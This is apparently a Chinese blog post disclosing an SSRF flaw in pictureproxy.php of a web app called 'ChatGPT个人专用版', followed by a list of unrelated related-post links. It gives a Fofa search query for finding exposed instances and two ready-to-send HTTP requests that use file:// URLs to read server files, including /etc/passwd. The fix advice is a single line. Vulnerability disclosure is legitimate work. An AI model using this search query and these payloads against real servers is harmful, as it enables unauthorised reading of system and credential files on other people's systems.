ChatGPT个人专用版 pictureproxy.php SSRF漏洞

0x01 漏洞描述:

ChatGPT个人专用版是一种基于人工智能的对话系统,旨在为用户提供个性化的交流体验。它能够理解和生成自然语言,帮助用户解决问题、获取信息或进行创意交流。通过不断学习和优化,ChatGPT个人专用版可以更好地适应用户的需求和偏好,提供更为精准和贴心的服务。其接口pictureproxy.php存在SSRF漏洞,攻击者可通过该漏洞获取系统敏感文件信息。

0x02 搜索语句:

Fofa:title="ChatGPT个人专用版"

0x03 漏洞复现:

宝塔服务网站:

GET /pictureproxy.php?url=file:www/wwwroot/网站路径/pictureproxy.php HTTP/1.1
Host:your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887 Safari/532.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Connection: close

linux服务网站

GET /pictureproxy.php?url=file:///etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887 Safari/532.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Connection: close

0x04 修复建议:

官方已更新补丁,请即时修复。

相关推荐
茶颜悦色vv2 小时前
shell脚本(6)
linux·运维·web安全·网络安全·bash
黑客K-ing13 小时前
开源网络安全检测工具——伏羲 Fuxi-Scanner
网络·数据库·web安全
youngzhiyong14 小时前
恋爱通信史之保密性
web安全·网络安全·密码学
Hacker_Fuchen16 小时前
Redis密码设置与访问限制(网络安全)
redis·web安全·bootstrap
Smile灬凉城66617 小时前
CTF之密码学(键盘加密)
安全·web安全·密码学
尘佑不尘20 小时前
蓝队基础,了解企业安全管理架构
数据库·笔记·安全·web安全·蓝队
山兔121 小时前
网络安全审计机制与实现技术
安全·web安全·php
黑客Ash21 小时前
网络安全提示
网络·安全·web安全